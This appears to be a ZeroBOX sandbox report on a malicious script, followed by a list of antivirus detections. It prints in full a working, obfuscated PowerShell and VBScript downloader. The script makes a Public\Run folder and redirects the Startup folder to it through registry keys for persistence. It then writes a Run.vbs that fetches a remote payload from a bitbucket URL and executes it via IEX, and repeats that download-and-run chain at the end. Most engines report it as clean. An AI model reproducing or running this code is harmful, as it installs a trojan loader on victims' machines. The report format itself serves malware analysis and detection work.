Static | ZeroBOX
No static analysis available.
$FVYTFYTFYFYFYFYFGY="C:\UsTRYCTUVYIBUCRYCTUVYIBTCRYTUYic\Run".Replace("TRYCTUVYIBUCRYCTUVYIBTCRYTUY","ers\Publ")
$YGUYGNUHYGUYGYUGYGUYGYUG = "Cr######################ory".Replace("######################","eateDirect")
[system.io.directory]::$YGUYGNUHYGUYGYUGYGUYGYUG($FVYTFYTFYFYFYFYFGY)
start-sleep -s 5
$HIUHIUHJIUHUYUUIHYIUIUHI = "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders"
$GVFHTFYUGRTYUGYFTFYYUH= "HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders"
$JYHGYUGUYGFYTFDTRDTRDFTR = "C:\Us--------------c\Run".Replace("--------------","ers\Publi")
$BFYHGTFYHFHUYGYU8YUYYUYG ="C------------blic\Run".Replace("------------",":\Users\Pu")
Set-ItemProperty -Path $HIUHIUHJIUHUYUUIHYIUIUHI -Name "Startup" -Value $JYHGYUGUYGFYTFDTRDTRDFTR;
Set-ItemProperty -Path $GVFHTFYUGRTYUGYFTFYYUH -Name "Startup" -Value $BFYHGTFYHFHUYGYU8YUYYUYG;
start-sleep -s 5
$Content = @'
Dim AAAAAAAAAAAAAAAA
SELL = Chr(69)
Set AAAAAAAAAAAAAAAA= CreateObject("WScript.sh"+SELL+"l"&"l")
BBBBBBBBBBBBBB= "P" +Chr(79) & "W"
CCCCCCCCCCCCCCCCCCCCCC=Chr(69) & "r" & Chr(83) & Chr(72) & Chr(69) & Chr(76)
DDDDDDDDDDDDDDDDDDDDD= Chr(76) & " $SRDTFYGUH"&"IUGYFTDR"
TTTTTTTTTTTTTTTTT = "YDTYU"&"FUGIHLUGY"&"FUTDUFY='https://bitbucket.org/thereopportunity/en-en/downloads/Tehas.txt';"
EEEEEEEEEEEEEEEEEEEEEEEEEEEEEE = "$SFDDHGFJGKHLJKHJGHFGFGDHFGHK='DOWNSDF"
QQQQQQQQQQQQQQQ = "GDHFJGKHFGHD"&"FGDHJGKHFJGDHFSHGDHJKGFHGD"
WWWWWWWWWWWWSSSSSSSSSSSSS = "HFSHGDJFKJGKJKHFJGDHING'.Rep"&"lace('SDFGDHFJGKHFGHDFGDHJGKHFJ"&"GDHFSHGDHJKG"
AAAAAAAAAAAASSSSSSSSSSSSSSS = "FHGDHFSHGDJFK"&"JGKJKHFJGDH','LO"&"ADSTR');"
GGGGGGGGGGGGGGGGGGGGGGGGGG ="$RGHTFYGUKLHIDZXF"&"CGVJHBHVGCFXDZFGXFHCGJV='SYEFSRGDTHY"
SSSSSSSSSSSSSSSDDDDDDDDDDDDDD = "FUGKYFTDRS"&"EASGRDHTFYUGKKGYFTDHRGDM.NEDT"&"HFYJGUKHGYFTDRYTFYGUHGYFTDYFYGUTDUFYGUBClIENT'.Re"&"place('EFSRGDTHY"
SSSSSDDDDDSSSSSSSSSDDDDDDDDD = "FUGKYFTDRSEASGRDHTFYUGKKGYFT"&"DHRGD','STE').Replace('DTHFYJGUKHGYFTDRYTF"&"YGUHGYFTDYFYGUTDUFYGU','T.WE');$ESTRDYTUFYGIUHIJOSERDTFYJGU"&"KYTDRSTDYFUGK = '(NAFSHDGF"
FFFFFFDDDDDDDDFFFFFFFFF = "JGKHLGFSGRHTDYFJGUKYFTDHRSHDTFYBJECT $RGHTFY"&"GUKLHIDZXFCGVJHBHVGCFXDZFGXFBBBBBBBBBBBBBBHHHHHHHHHHHHHRDTFYGUH"&"IUGYFTDRYDTYUFUGIHLUGYFUTDUFY)'.Replace('AFSHDGFJGKHLGFSGRHTD"
AAASSSSSSSSSSKKKKKKKK = "YFJGUKYFTDHRSHDTFY','EW-O').Replace('BBBBBBBBBBBBBBHHHHHHHHHHHHH','HCGJV ).$SFDDH"&"GFJGKHLJKHJGHFGFGDHFGHK($S');"
KKKKKKKKKKKKKKKKKKKKKKK = "$ERTTDYFYUGUYTREZRTFYGKUFDSS45HD6F7GK=&('I'+'EX')($EST"
SSSSSSSCCCCCCCCVVVVVVVVVV = "RDYTUFYGIUHIJOSERDTFYJGUKYTDRSTDYFUGK -Join '')|&('I'+'EX');"
VVVVVVVVVVVVVVVVVVVVVVVVVV = BBBBBBBBBBBBBB+CCCCCCCCCCCCCCCCCCCCCC+DDDDDDDDDDDDDDDDDDDDD+TTTTTTTTTTTTTTTTT+EEEEEEEEEEEEEEEEEEEEEEEEEEEEEE+QQQQQQQQQQQQQQQ+WWWWWWWWWWWWSSSSSSSSSSSSS+AAAAAAAAAAAASSSSSSSSSSSSSSS+GGGGGGGGGGGGGGGGGGGGGGGGGG+SSSSSSSSSSSSSSSDDDDDDDDDDDDDD+SSSSSDDDDDSSSSSSSSSDDDDDDDDD+FFFFFFDDDDDDDDFFFFFFFFF+AAASSSSSSSSSSKKKKKKKK+KKKKKKKKKKKKKKKKKKKKKKK+SSSSSSSCCCCCCCCVVVVVVVVVV+""
AAAAAAAAAAAAAAAA.Run VVVVVVVVVVVVVVVVVVVVVVVVVV,0
Set-Content -Path C:\Users\Public\Run\Run.vbs -Value $Content
start-sleep -s 5
$TRUMP = 'https://bitbucket.org/thereopportunity/en-en/downloads/Tehas.txt';
$B = 'ETH COINt.WTF COINlIOSNT'.Replace('ETH COIN','nE').Replace('TF COIN','EbC').Replace('OS','e');
$CC = 'DOS COIN LSOSCOINnG'.Replace('S COIN ','Wn').Replace('SO','oaD').Replace('COIN','TrI');
$A ='I`Eos COIN`W`BTC COINj`ETH COIN $B).$CC($TRUMP)'.Replace('os COIN','X(n`e').Replace('BTC COIN','-Ob').Replace('TH COIN','`c`T');
&('I'+'EX')($A -Join '')|&('I'+'EX');
Antivirus Signature
Bkav Clean
Lionic Clean
DrWeb PowerShell.DownLoader.1435
ClamAV Clean
FireEye Clean
CAT-QuickHeal Clean
ALYac Clean
Malwarebytes Clean
Sangfor Clean
K7AntiVirus Clean
K7GW Clean
Arcabit Clean
BitDefenderTheta Clean
Cyren VBS/Agent.AEC
Symantec Clean
ESET-NOD32 VBS/Agent.PIO
TrendMicro-HouseCall Clean
Avast Script:SNH-gen [Trj]
Cynet Clean
Kaspersky Clean
BitDefender Clean
NANO-Antivirus Clean
ViRobot Clean
MicroWorld-eScan Clean
Rising Clean
Ad-Aware Clean
Sophos Clean
Comodo Clean
F-Secure Clean
Baidu Clean
VIPRE Clean
TrendMicro Clean
CMC Clean
Emsisoft Clean
Jiangmin Clean
Avira Clean
MAX Clean
Antiy-AVL Clean
Kingsoft Clean
Gridinsoft Clean
Microsoft Clean
SUPERAntiSpyware Clean
ZoneAlarm Clean
GData Clean
AhnLab-V3 Clean
McAfee Clean
TACHYON Clean
VBA32 Clean
Zoner Clean
Tencent Clean
Yandex Clean
Ikarus Trojan.VBS.Agent
MaxSecure Clean
Fortinet VBS/Agent.EBM!tr
AVG Script:SNH-gen [Trj]
Panda Clean
Qihoo-360 virus.vbs.qexvmc.1065
No IRMA results available.